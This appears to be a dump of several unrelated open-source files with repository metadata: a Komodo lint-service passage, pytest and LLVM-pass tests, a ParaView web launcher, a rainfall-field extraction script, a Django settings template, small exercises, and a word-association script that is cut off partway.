an unexpected EOL.
"results" in a koILintResults to which to add mixed EOL results.
"content" is the content to analyze
"expectedEOL" is the currently configured EOL for the document,
this must be on of the EOL_LF, EOL_CR, EOL_CRLF constants.
"""
import eollib
mixedEOLs = eollib.getMixedEOLLineNumbers(content, expectedEOL)
if not mixedEOLs:
return
def collapseContinuousLineNumbers(lineNos):
"""Return a collapsed group of continuous line numbers."""
results = []
start = -10
last = -10
for lineNo in lineNos:
if lineNo == last+1:
pass
else:
if start >= 0:
results.append((start, last))
start = lineNo
last = lineNo
if start >= 0:
results.append((start, last))
return results
# Add a warning lint result for each such line.
expectedEOLStr = eollib.eol2eolPref[expectedEOL]
lines = content.splitlines(1)
# For performance reasons, we collapse groups of continuous line
# numbers into the one line result - bug 92733.
for lineStart, lineEnd in collapseContinuousLineNumbers(mixedEOLs):
r = KoLintResult()
r.description = "This line does not end with the expected "\
"EOL: '%s' (select View | View EOL Markers)"\
% expectedEOLStr
r.lineStart = lineStart+1
r.lineEnd = lineEnd+1
r.columnStart = 1
r.columnEnd = len(lines[lineEnd]) + 1
r.severity = r.SEV_WARNING
results.addResult(r)
# When a new panel is added for a language in
# pref-syntax-checking.xul, we'll need to pull the generic marker
# out of any documents that adopted it. We can either do it when
# we open the doc (although we have to wait until we know its language),
# but this way we only check when we're about to lint.
#
# Also, it's too bad that doc prefs aren't versioned.
_no_longer_generic_languages = ["Python3", "HTML5"]
def _passesGenericCheck(self, request):
prefs = request.koDoc.prefs
languageName = request.koDoc.language
genericCheck = "genericLinter:" + languageName
if not prefs.hasPref(genericCheck):
return True
if languageName in self._no_longer_generic_languages:
prefs.deletePref(genericCheck)
return True
return prefs.getBooleanPref(genericCheck)
def run(self):
"""Process lint requests serially until told to stop.
Before the requested linter is run on a document it is first checked
for encoding problems (i.e. encoding is not sufficient for current
content).
"""
TIME_LINTS = False
log.info("manager thread: start")
while 1:
try:
# wait for next request
request = self.requests.get()
# quit if request is the quit sentinel
if request is None:
log.info("manager thread: quit sentinel")
break
# process the request
if TIME_LINTS: startlint = time.clock()
log.info("manager thread: process request: %r", request)
try:
# Look for encoding errors first.
results = self._getEncodingLintResults(request.content,
request.encoding)
if TIME_LINTS: endencodinglint = time.clock()
# If there were no encoding errors, try the
# requested linter.
if not results.getNumResults() and request.linter:
#XXX This is where context-sensitive linting args should
# be passed in, but linters don't support this yet.
log.debug("manager thread: call linter.lint(request)")
try:
if self._passesGenericCheck(request):
results = request.linter.lint(request)
#results = UnwrapObject(request.linter).lint(request)
# This makes a red statusbar icon go green, but it
# might not be what we always want.
# Needs more investigation.
#if results is None:
# results = koLintResults()
except:
log.exception("Unexpected error while linting")
# This makes a red statusbar icon go green, but it
# might not be what we always want.
# Needs more investigation.
#if results is None:
# results = koLintResults()
log.debug("manager thread: linter.lint(request) returned")
if TIME_LINTS: endlintlint = time.clock()
prefset = getProxiedEffectivePrefs(request)
if prefset.getBooleanPref("lintEOLs"):
# Also look for mixed-line endings warnings.
self._addMixedEOLWarnings(results, request.content,
request.koDoc.new_line_endings)
if TIME_LINTS:
endeollint = time.clock()
print "lint of '%s': encoding=%.3fs lint=%.3fs eol=%.3fs"\
% (request.koDoc.baseName,
endencodinglint-startlint,
endlintlint-endencodinglint,
endeollint-endlintlint)
request.results = results
except (ServerException, COMException), ex:
request.errorString = str(ex)
except:
# Any exceptions that are not ServerException or
# COMException are unexpected internal errors.
try:
err = "unexpected internal error checking '%s' with '%s' linter"\
% (request.koDoc.baseName, request.linterType)
log.exception(err)
request.errorString = err
except:
err = "Unexpected error in koLintService.run"
log.error(err)
request.errorString = err
else:
log.info("manager thread: lint results for uid %s: %r",
request.uid, results)
# Notify of request completion
# Note: this is not guaranteed to properly guard the proxy
# call because a context switch could happen in between the
# condition check and body. That is ok though. At worst it
# will raise an exception that will be trapped just below.
# The point is to catch the common case. I am pretty sure
# that there is no way to do this properly without going
# to great lengths.
if not self._shuttingDown:
try:
# Proxy this so the worker thread can report results on this iface.
lintBufferProxy = getProxyForObject(1,
components.interfaces.koILintBuffer, request.lintBuffer,
PROXY_ALWAYS | PROXY_SYNC)
lintBufferProxy.reportResults(request)
except COMException, ex:
# Ignore this error, which will happen if results
# are reported after the buffer has gone away (i.e.
# the file owning that buffer was closed):
# Traceback (most recent call last):
# File "...\koLintService.py", line 370, in run
# request.lintBuffer.reportResults(request)
# File "<XPCOMObject method 'reportResults'>", line 3, in reportResults
# Exception: 0x80570021 ()
errno = ex.args[0]
if errno == 0x80570021:
pass
else:
raise
except:
# Something bad happened, but don't let this thread die.
log.exception("unexpected error in the linting thread")
log.info("manager thread: end")
if __name__ == "__main__":
logging.basicConfig()
import pprint
class TestRequest:
def __init__(self, uid):
self.uid = uid
def __repr__(self):
return "<TestRequest: uid=%s>" % self.uid
q = RequestQueue()
if 0:
q.put(TestRequest("id_1"))
q.remove_uid("id_1")
print "item:"
sys.stdout.flush()
print q.get()
if 1:
q.put(TestRequest("id_1"))
q.put(TestRequest("id_2"))
pprint.pprint(q.queue)
print "item: ", q.get()
q.put(TestRequest("id_3"))
q.put(TestRequest("id_4"))
q.put(TestRequest("id_3"))
q.prepend(None)
pprint.pprint(q.queue)
q.remove_uid("id_3")
pprint.pprint(q.queue)
q.remove_uid("id_3")
sys.stdout.flush()
pprint.pprint(q.queue)
q.remove_uid("id_4")
pprint.pprint(q.queue)
print "item: ", q.get()
print "item: ", q.get()
pprint.pprint(q.queue)
| [
"[email protected]"
] | |
7b0c4083d029a92441704bd296c1aef0ebbf84f2 | 2d4ab8e3ea9fd613ec0ae0c1956b68874c9b5f06 | /tests/pipelines/cnv_calling/test_xhmm_pca.py | e9dc13feb4ca41c6220481e9e7105e1e72bce443 | [] | no_license | biocodices/paip | 4abd39cbbd372a68592da87177c70c403d5a661d | 040a62c11e5bae306e2de4cc3e0a78772ee580b3 | refs/heads/master | 2021-01-17T20:48:28.642255 | 2019-07-26T14:30:58 | 2019-07-26T14:30:58 | 62,604,413 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,013 | py | from unittest.mock import MagicMock
import pytest
from paip.pipelines.cnv_calling.xhmm_pca import XhmmPCA, EmptyInputMatrix
@pytest.fixture
def task(cohort_task_factory):
return cohort_task_factory(XhmmPCA)
def test_check_matrix(task):
# NOTE: Run this test before the next one, because the tested method
# check_matrix() will be mocked in test_run().
empty_matrix = pytest.helpers.file('empty_matrix.txt')
with pytest.raises(EmptyInputMatrix):
task.check_matrix(empty_matrix)
def test_run(task, mock_rename):
check_matrix = MagicMock()
task.check_matrix = check_matrix
task.run()
check_matrix.assert_called_once()
(command, ), kwargs = task.run_command.call_args
assert 'xhmm --PCA' in command
assert 'DATA.filtered_centered.RD.txt' in command
assert 'DATA-temp.RD_PCA' in command
assert mock_rename.call_count == 3
assert 'DATA-temp.RD_PCA' in mock_rename.call_args[0][0]
assert 'DATA.RD_PCA' in mock_rename.call_args[0][1]
| [
"[email protected]"
] | |
7df75a268c13f4de545db13ec51df02cd9cdbda5 | ddcc89dc88961f37d50c0f9d893f265bf34afdb3 | /test/test_simple_module_pass.py | f6be33ae365cbfb62819b6d08a8740fcd1ff5120 | [
"Unlicense",
"LicenseRef-scancode-unknown-license-reference",
"NCSA",
"LicenseRef-scancode-public-domain"
] | permissive | mulle-nat/property-syntax-modernizer | f351319314a0216e5e241fa03f9d95a3764a6590 | 93445534221840d0df6cfb2d2f4ceb73f37ac962 | refs/heads/master | 2020-08-07T08:57:02.149734 | 2019-10-07T12:46:11 | 2019-10-07T12:46:11 | 213,381,270 | 0 | 0 | Unlicense | 2019-10-07T13:11:51 | 2019-10-07T12:47:05 | C++ | UTF-8 | Python | false | false | 442 | py | import sys, unittest
from tools import SamplesTestCase
OUTPUT_FOR_GLOBALS = '''\
Found global named "gfloat": type = float*
Found global named "gppfloat": type = float***
Found global named "gint": type = i32*
'''
PROG = 'simple_module_pass'
class TestSimpleModulePass(SamplesTestCase):
def test_on_globals(self):
self.assertSampleOutput([PROG], 'globals.ll', OUTPUT_FOR_GLOBALS)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
015c735e062ac63dde157d1b06e700b8009e14ce | 8a1241ac8ad91672aec81c878f2165a7678a1ad6 | /Web/Applications/Visualizer/server/pv_web_visualizer.py | 84ef98ae22d8c269ffca4d47cdd4e0a31d3dd2f0 | [
"MIT",
"LicenseRef-scancode-paraview-1.2",
"Apache-2.0",
"LicenseRef-scancode-protobuf",
"BSD-3-Clause"
] | permissive | lmynsberge/ParaView | d9fbd0f4da197bc96172be8697ced76fe73852bf | 2a68ee496949becf499742dfdbecb41b1eda81a7 | refs/heads/master | 2021-01-22T16:18:25.241194 | 2013-11-11T15:01:02 | 2013-11-11T15:01:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,203 | py | r"""
This module is a ParaViewWeb server application.
The following command line illustrate how to use it::
$ pvpython .../pv_web_visualizer.py --data-dir /.../path-to-your-data-directory
--data-dir is used to list that directory on the server and let the client choose a file to load.
--load-file try to load the file relative to data-dir if any.
--ds-host None
Host name where pvserver has been started
--ds-port 11111
Port number to use to connect to pvserver
--rs-host None
Host name where renderserver has been started
--rs-port 22222
Port number to use to connect to the renderserver
Any ParaViewWeb executable script come with a set of standard arguments that
can be overriden if need be::
--port 8080
Port number on which the HTTP server will listen to.
--content /path-to-web-content/
Directory that you want to server as static web content.
By default, this variable is empty which mean that we rely on another server
to deliver the static content and the current process only focus on the
WebSocket connectivity of clients.
--authKey vtkweb-secret
Secret key that should be provided by the client to allow it to make any
WebSocket communication. The client will assume if none is given that the
server expect "vtkweb-secret" as secret key.
"""
# import to process args
import os
# import paraview modules.
from paraview.web import wamp as pv_wamp
from paraview.web import protocols as pv_protocols
from vtk.web import server
try:
import argparse
except ImportError:
# since Python 2.6 and earlier don't have argparse, we simply provide
# the source for the same as _argparse and we use it instead.
import _argparse as argparse
# =============================================================================
# Create custom Pipeline Manager class to handle clients requests
# =============================================================================
class _PipelineManager(pv_wamp.PVServerProtocol):
dataDir = None
authKey = "vtkweb-secret"
dsHost = None
dsPort = 11111
rsHost = None
rsPort = 11111
fileToLoad = None
def initialize(self):
# Bring used components
self.registerVtkWebProtocol(pv_protocols.ParaViewWebStartupRemoteConnection(_PipelineManager.dsHost, _PipelineManager.dsPort, _PipelineManager.rsHost, _PipelineManager.rsPort))
self.registerVtkWebProtocol(pv_protocols.ParaViewWebStateLoader(_PipelineManager.fileToLoad))
self.registerVtkWebProtocol(pv_protocols.ParaViewWebPipelineManager(_PipelineManager.dataDir, _PipelineManager.fileToLoad))
self.registerVtkWebProtocol(pv_protocols.ParaViewWebMouseHandler())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPort())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPortImageDelivery())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPortGeometryDelivery())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebTimeHandler())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebRemoteConnection())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebFileManager(_PipelineManager.dataDir))
# Update authentication key to use
self.updateSecret(_PipelineManager.authKey)
# =============================================================================
# Main: Parse args and start server
# =============================================================================
if __name__ == "__main__":
# Create argument parser
parser = argparse.ArgumentParser(description="ParaView/Web Pipeline Manager web-application")
# Add default arguments
server.add_arguments(parser)
# Add local arguments
parser.add_argument("--data-dir", default=os.getcwd(), help="path to data directory to list", dest="path")
parser.add_argument("--load-file", default=None, help="File to load if any based on data-dir base path", dest="file")
parser.add_argument("--ds-host", default=None, help="Hostname to connect to for DataServer", dest="dsHost")
parser.add_argument("--ds-port", default=11111, type=int, help="Port number to connect to for DataServer", dest="dsPort")
parser.add_argument("--rs-host", default=None, help="Hostname to connect to for RenderServer", dest="rsHost")
parser.add_argument("--rs-port", default=11111, type=int, help="Port number to connect to for RenderServer", dest="rsPort")
# Exctract arguments
args = parser.parse_args()
# Configure our current application
_PipelineManager.authKey = args.authKey
_PipelineManager.dataDir = args.path
_PipelineManager.dsHost = args.dsHost
_PipelineManager.dsPort = args.dsPort
_PipelineManager.rsHost = args.rsHost
_PipelineManager.rsPort = args.rsPort
if args.file:
_PipelineManager.fileToLoad = args.path + '/' + args.file
# Start server
server.start_webserver(options=args, protocol=_PipelineManager)
| [
"[email protected]"
] | |
aa80166792010844c80020d87de369afec96d42a | 5eff9df4d276e83c68ce843d58868499858f701a | /Leetcode - FB/p0350.py | 3780986eb5c2d856d4e29deeeacac48b9f10fdf7 | [] | no_license | arunraman/Code-Katas | b6723deb00caed58f0c9a1cafdbe807e39e96961 | 7fe3582fa6acf59a2620fe73e1e14bd8635bbee8 | refs/heads/master | 2023-03-04T17:27:44.037145 | 2023-03-02T21:09:53 | 2023-03-02T21:09:53 | 25,232,784 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 456 | py | class p0349(object):
def intersectiontwoArrays(self, nums1, nums2):
dict1 = dict()
for i in nums1:
if i not in dict1:
dict1[i] = 1
else:
dict1[i] += 1
ret = []
for i in nums2:
if i in dict1 and dict1[i] > 0:
ret.append(i)
dict1[i] -= 1
return ret
S = p0349()
print S.intersectiontwoArrays([1, 2, 2, 1], [2, 2]) | [
"[email protected]"
] | |
205e2c6f3f8e1f3fd358d21e4ccbb1da32701a93 | 021a3dff055d4b3e40aafc63f0029dc280466233 | /db_scripts/curw_fcst/rfield/gen_rfield_kelani_basin_parallelized_optimized.py | e2bed1eb35b657a3592bea9d212fe72a3c8b6482 | [] | no_license | shadhini/curw_helpers | 45efe90d887c702b3a3f5877163647e220d230e4 | 101d896f8b589b478ef146b5b4dd99ec24f2dc84 | refs/heads/master | 2021-07-03T02:53:13.398052 | 2020-10-28T03:39:58 | 2020-10-28T03:39:58 | 185,217,580 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,854 | py | #!/home/uwcc-admin/curw_rfield_extractor/venv/bin/python3
import traceback
import pymysql
import json
import getopt
import sys
import os
import re
import multiprocessing as mp
from datetime import datetime, timedelta
# connection params
HOST = ""
USER = ""
PASSWORD = ""
DB =""
PORT = ""
VALID_MODELS = ["WRF_A", "WRF_C", "WRF_E", "WRF_SE"]
VALID_VERSIONS = ["v3", "v4", "4.0"]
SIM_TAGS = ["evening_18hrs"]
root_directory = '/var/www/html'
bucket_root = '/mnt/disks/wrf_nfs'
def read_attribute_from_config_file(attribute, config):
"""
:param attribute: key name of the config json file
:param config: loaded json file
:return:
"""
if attribute in config and (config[attribute]!=""):
return config[attribute]
else:
print("{} not specified in config file.".format(attribute))
exit(1)
def write_to_file(file_name, data):
with open(file_name, 'w+') as f:
f.write('\n'.join(data))
def create_rfield(connection, wrf_model, version, sim_tag, timestamp):
# rfield = [['latitude', 'longitude', 'rainfall']]
rfield = []
with connection.cursor() as cursor0:
cursor0.callproc('get_d03_rfield_kelani_basin_rainfall', (wrf_model, version, sim_tag, timestamp))
results = cursor0.fetchall()
for result in results:
rfield.append('{}'.format(result.get('value')))
write_to_file('{}/wrf/{}/{}/rfield/kelani_basin/{}_{}_{}_rfield.txt'
.format(root_directory, version, sim_tag, wrf_model, version, timestamp.strftime('%Y-%m-%d_%H-%M')), rfield)
#############################
# Raw WRF RFIELD GENERATION #
#############################
def gen_rfield_d03_kelani_basin(wrf_model, version, sim_tag):
# remove outdated rfields
try:
os.system("sudo rm {}/wrf/{}/{}/rfield/kelani_basin/{}_{}_*".format(root_directory, version, sim_tag, wrf_model, version))
except Exception as e:
traceback.print_exc()
start_time = ''
end_time = ''
now = datetime.strptime((datetime.now()+timedelta(hours=5, minutes=30)).strftime('%Y-%m-%d 00:00:00'), '%Y-%m-%d %H:%M:%S')
try:
# Connect to the database
connection = pymysql.connect(host=HOST, user=USER, password=PASSWORD, db=DB,
cursorclass=pymysql.cursors.DictCursor)
# Extract timeseries start time and end time
with connection.cursor() as cursor1:
cursor1.callproc('get_TS_start_end', (wrf_model, version, sim_tag))
result = cursor1.fetchone()
start_time = result.get('start')
end_time = result.get('end')
if end_time > (now + timedelta(days=1)):
# Extract rfields
timestamp = start_time
while timestamp <= end_time:
create_rfield(connection=connection, wrf_model=wrf_model, version=version, sim_tag=sim_tag,
timestamp=timestamp)
timestamp = datetime.strptime(str(timestamp), '%Y-%m-%d %H:%M:%S') + timedelta(minutes=15)
return True
except Exception as ex:
traceback.print_exc()
return False
finally:
connection.close()
print("Process finished")
def usage():
usageText = """
Usage: python gen_rfield_kelani_basin_parallelized_optimized_with_past_future.py -m WRF_X1,WRF_X2,WRF_X3 -v vX -s "evening_18hrs"
-h --help Show usage
-m --wrf_model List of WRF models (e.g. WRF_A, WRF_E). Compulsory arg
-v --version WRF model version (e.g. v4, v3). Compulsory arg
-s --sim_tag Simulation tag (e.g. evening_18hrs). Compulsory arg
"""
print(usageText)
if __name__=="__main__":
my_pool = None
try:
wrf_models = None
version = None
sim_tag = None
try:
opts, args = getopt.getopt(sys.argv[1:], "h:m:v:s:",
["help", "wrf_model=", "version=", "sim_tag="])
except getopt.GetoptError:
usage()
sys.exit(2)
for opt, arg in opts:
if opt in ("-h", "--help"):
usage()
sys.exit()
elif opt in ("-m", "--wrf_model"):
wrf_models = arg.strip()
elif opt in ("-v", "--version"):
version = arg.strip()
elif opt in ("-s", "--sim_tag"):
sim_tag = arg.strip()
print(wrf_models, version, sim_tag)
print(VALID_MODELS, VALID_VERSIONS, SIM_TAGS)
# load connection parameters
config = json.loads(open('/home/uwcc-admin/curw_rfield_extractor/db_config.json').read())
# connection params
HOST = read_attribute_from_config_file('host', config)
USER = read_attribute_from_config_file('user', config)
PASSWORD = read_attribute_from_config_file('password', config)
DB = read_attribute_from_config_file('db', config)
PORT = read_attribute_from_config_file('port', config)
wrf_model_list = wrf_models.split(',')
for wrf_model in wrf_model_list:
if wrf_model is None or wrf_model not in VALID_MODELS:
usage()
exit(1)
if version is None or version not in VALID_VERSIONS:
usage()
exit(1)
if sim_tag is None or sim_tag not in SIM_TAGS:
usage()
exit(1)
rfield_home = "{}/wrf/{}/{}/rfield/kelani_basin".format(root_directory, version, sim_tag)
try:
os.makedirs(rfield_home)
except FileExistsError:
# directory already exists
pass
gfs_data_hour =re.findall(r'\d+', sim_tag)[0]
bucket_rfield_home = "{}/wrf/{}/{}/rfield/kelani_basin".format(bucket_root, version, gfs_data_hour)
try:
os.makedirs(bucket_rfield_home)
except FileExistsError:
# directory already exists
pass
# copy file containing xy coordinates to the rfield home
try:
os.system("cp kelani_basin_xy.csv {}/xy.csv".format(rfield_home))
except Exception:
pass
mp_pool = mp.Pool(mp.cpu_count())
results = mp_pool.starmap(gen_rfield_d03_kelani_basin,
[(wrf_model, version, sim_tag) for wrf_model in wrf_model_list])
# results = mp_pool.starmap_async(gen_rfield_d03_kelani_basin,
# [(wrf_model, version, sim_tag) for wrf_model in wrf_model_list]).get()
print("results: ", results)
except Exception as e:
print('JSON config data loading error.')
traceback.print_exc()
finally:
if my_pool is not None:
mp_pool.close()
os.system("tar -czvf {}/rfield.tar.gz {}/*".format(bucket_rfield_home, rfield_home))
| [
"[email protected]"
] | |
d1f9c5d8fe6a52dd2e130204f45e94850dfa5e0f | 33f86c1678d2f5e15da77885e0bf770f405201a4 | /tcamp/local_settings.example.py | b5b48f86971536c25ec25d5c61d13c2805a1304e | [
"BSD-3-Clause"
] | permissive | imclab/tcamp | 5410c9549ed7731575e7312acfed7b8e4cd0c58d | 111cabab90b2c8cf651ee480520bc43a33f30844 | refs/heads/master | 2021-01-18T12:15:58.484183 | 2014-03-05T21:36:00 | 2014-03-05T21:36:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,832 | py | DEBUG = True
ADMINS = (
('', ''),
)
MANAGERS = ADMINS
INTERNAL_IPS = ('127.0.0.1', )
SECRET_KEY = ''
DATABASES = {
'local': {
'ENGINE': '', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
},
'staging': {
'ENGINE': '', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
},
'production': {
'ENGINE': '', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
DATABASES['default'] = DATABASES['local']
FAVICON = ''
APPLE_TOUCH_ICON = ''
SHARING_IMAGE = ''
FB_APP_ID = ''
GOOGLE_ANALYTICS_ID = ''
AWS_ACCESS_KEY_ID = ''
AWS_SECRET_ACCESS_KEY = ''
ASSET_SITE_VERSION = '1.0'
COMPRESS_URL = ''
COMPRESS_STORAGE = ''
STATICFILES_STORAGE = COMPRESS_STORAGE
STATIC_URL = COMPRESS_URL
POSTMARK_API_KEY = ''
POSTMARK_SENDER = ''
GOOGLEAUTH_DOMAIN = ''
GOOGLEAUTH_REALM = ''
TWITTER_CONSUMER_KEY = ''
TWITTER_CONSUMER_SECRET = ''
FACEBOOK_APP_ID = ''
FACEBOOK_API_SECRET = ''
GOOGLE_OAUTH2_CLIENT_ID = ''
GOOGLE_OAUTH2_CLIENT_SECRET = ''
GITHUB_APP_ID = ''
GITHUB_API_SECRET = ''
DISQUS_CLIENT_ID = ''
DISQUS_CLIENT_SECRET = ''
AKISMET_KEY = ''
TWITTER_CONSUMER_KEY = ''
TWITTER_CONSUMER_SECRET = ''
TWITTER_ACCESS_KEY = ''
TWITTER_ACCESS_SECRET = ''
DISQUS_SHORTNAME = ''
BRAINSTORM_USE_DISQUS = True
BRAINSTORM_LOGIN_OPTIONS = (
('Twitter', '/login/twitter/'),
('Facebook', '/login/facebook/'),
('Google', '/login/google-oauth2/'),
('Github', '/login/github/'),
)
VARNISH_MANAGEMENT_ADDRS = ()
TWILIO_ACCOUNT_SID = ''
TWILIO_AUTH_TOKEN = ''
RAVEN_CONFIG = {
'dsn': '',
} | [
"[email protected]"
] | |
af0ff074d35191259400a9937db81997e7772ffd | d52cb4c2e880875944b14da0b8a9542235942ac8 | /geeksforgeeks/heap/6_Find_median_in_stream.py | 521a8f79468f59a0c175f5766c7681ae8d0a619c | [] | no_license | saparia-data/data_structure | fbd61535b68f92143b2cb2679377c0f56f424670 | 2e8700cfdaeefe0093e5b4fb2704b1abcd300d02 | refs/heads/master | 2023-05-08T18:54:52.250941 | 2021-06-04T05:44:29 | 2021-06-04T05:44:29 | 296,071,146 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,382 | py | '''
Given an input stream of N integers.
The task is to insert these numbers into a new stream and find the median of the stream formed by each insertion of X to the new stream.
Example 1:
Input:
N = 4
X[] = 5,15,1,3
Output:
5
10
5
4
Explanation:Flow in stream : 5, 15, 1, 3
5 goes to stream --> median 5 (5)
15 goes to stream --> median 10 (5,15)
1 goes to stream --> median 5 (5,15,1)
3 goes to stream --> median 4 (5,15,1 3)
'''
import heapq
min_heap = []
max_heap = []
def balanceHeaps():
'''
use globals min_heap and max_heap, as per declared in driver code
use heapify modules , already imported by driver code
Balance the two heaps size , such that difference is not more than one.
'''
if abs(len(min_heap)-len(max_heap)) <= 1:
return # already balanced
# take out one element from top of heap with greater size, and push in other heap
if len(min_heap)>len(max_heap): # min_heap has more data
value_top = heapq.heappop(min_heap)
# push in max heap, using negative as it is implemented on min heap
heapq.heappush(max_heap,-1*value_top) # value inserted in max heap
else:
# take from max heap and insert in min heap
value_top = -1* heapq.heappop(max_heap) # negate it to get original value
heapq.heappush(min_heap,value_top) # insert value in min heap
return
def getMedian():
'''
use globals min_heap and max_heap, as per declared in driver code
use heapify modules , already imported by driver code
:return: return the median of the data received till now.
'''
# cases with odd number of elements in data
if len(max_heap)>len(min_heap):
# return the element from top of max_heap
value = heapq.heappop(max_heap)
heapq.heappush(max_heap,value) # push element back in max heap
return (-1*value)
elif len(min_heap)>len(max_heap):
# return the top element from min heap
value = heapq.heappop(min_heap)
heapq.heappush(min_heap,value)
return value
else:
# the number of elements is even in data, return the average of the two values
val_min = heapq.heappop(min_heap)
val_max = -1*heapq.heappop(max_heap)
# push these values back in the heap
heapq.heappush(min_heap,val_min)
heapq.heappush(max_heap,-1*val_max)
return ((val_max+val_min)//2) # return the average of the two
def insertHeaps(x):
'''
use globals min_heap and max_heap, as per declared in driver code
use heapify modules , already imported by driver code
:param x: value to be inserted
:return: None
'''
# if top of min heap is less than x, x belongs in upper half
least_upperhalf = heapq.heappop(min_heap) if len(min_heap) else -1 # minimum element of upper half or -1 if empty
# if popped, push in min_heap again
if least_upperhalf!=-1:
heapq.heappush(min_heap,least_upperhalf)
if x >= least_upperhalf :
heapq.heappush(min_heap,x) # insert in min_heap
else:
# x belongs in lower half
# as this is a max_heap implemented on heapq, hence negative of x will be inserted to maintain
# max heap property.
heapq.heappush(max_heap,-1*x)
arr = [5,15,1,3]
n = len(arr)
for i in range(n):
insertHeaps(arr[i])
balanceHeaps()
print(getMedian()) | [
"[email protected]"
] | |
a15aa9381f0639460207512eace0c0e66ea54b4b | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4327/codes/1602_2049.py | 1ce019700e7801903c6df341e812f94f4b2cb946 | [] | no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 302 | py | # Teste seu codigo aos poucos.
# Nao teste tudo no final, pois fica mais dificil de identificar erros.
# Nao se intimide com as mensagens de erro. Elas ajudam a corrigir seu codigo.
x=int(input("informe o dividendo: " ))
y=int(input("informe o divisor: " ))
print (x)
print (y)
print (x//y)
print (x%y) | [
"[email protected]"
] | |
eaa1694453e2fb1d8f4e20c3a6a0852dc8c2f92c | bec66ec0c920939547466b2b8f9d65813d560d1d | /noxious/__init__.py | f007d1198e0435f72d773eb479f29a48d9534092 | [] | no_license | mbr/noxious | cbb3be2ca725a0282db390520306da7ebba75339 | 6c48fe84867d80614defa6bdce4d4640ce657ae5 | refs/heads/master | 2023-06-06T20:42:08.079423 | 2015-08-30T10:54:52 | 2015-08-30T10:54:52 | 41,625,389 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,557 | py | import xml.etree.ElementTree as ET
def from_file(fn):
tree = ET.parse(fn)
return Noxious(tree.getroot())
class Noxious(object):
def __init__(self, elem, parent=None):
self._parent = parent
self._elem = elem
def _all(self):
return [self.__class__(sibling)
for sibling in self._parent._elem.findall(self._elem.tag)]
def _get_path(self):
path = []
tag = self
while tag:
path.insert(0, tag._elem.tag)
tag = tag._parent
root = path.pop(0)
return root + ''.join('[{!r}]'.format(p) for p in path)
def _text(self):
return self._elem.text
def __add__(self, other):
return str(self) + other
def __bool__(self):
e = self._elem
return bool(e.text or list(e))
def __float__(self):
return float(str(self))
def __int__(self):
return int(str(self))
def __getitem__(self, name):
child = self._elem.find(name)
if child is None:
raise KeyError('No child {} on {!r}'.format(name, self))
return self.__class__(child, self)
def __getattr__(self, name):
if name not in self._elem.attrib:
raise AttributeError('No attribute {} on {!r}'.format(name, self))
return self._elem.attrib[name]
# py2:
__nonzero__ = __bool__
def __radd__(self, other):
return other + str(self)
def __str__(self):
return self._text()
def __repr__(self):
return self._get_path()
| [
"[email protected]"
] | |
4b2654ba6bffd9e20cf44a960e8ed5166476ba81 | 749aca95edfaad9e7d8b84dc2c6f62038595efc3 | /mandala.py | dac1d0eae959c6a652cc1f391088ca60e9419b56 | [] | no_license | xmduhan/mandala | efe72b116ec829457cd2286b88b4544d5538861c | eafea6c9ebd0ca913c070f0bf2cbf72a6566b0a7 | refs/heads/master | 2021-06-30T16:30:49.410637 | 2017-09-20T09:44:53 | 2017-09-20T09:44:53 | 104,153,412 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,494 | py | #!/usr/bin/env python
# encoding: utf-8
import dataset
from pyfiglet import Figlet
from termcolor import cprint
from prompt_toolkit import prompt as _prompt
from prompt_toolkit.history import InMemoryHistory
from itertools import count
from treelib import Tree
from pandas import DataFrame
history = InMemoryHistory()
db = dataset.connect('sqlite:///db.sqlite')
table = db['relation']
db.begin()
def commit():
""" """
db.commit()
db.begin()
print u'保存成功!'
def rollback():
""" """
db.rollback()
db.begin()
print u'操作撤销'
def save(w0, w1):
""" """
table.insert({'w0': w0, 'w1': w1})
# print u'%s --> %s: ' % (w0, w1)
cprint(' |-- ', 'green', end='')
cprint('%s --> %s: ' % (w0, w1), color='blue', end='')
cprint('+1', 'red')
def prompt(text):
return _prompt(text, history=history).strip()
def star(w0=None):
""" """
if w0 is None:
w0 = prompt(u'关键词:')
if len(w0) == 0:
return
for i in count(start=1, step=1):
w1 = prompt(u'%s --> (%d):' % (w0, i))
if len(w1) == 0:
break
save(w0, w1)
def chain(w0=None):
""" """
if w0 is None:
w0 = prompt(u'关键词:')
if len(w0) == 0:
return
for i in count(start=1, step=1):
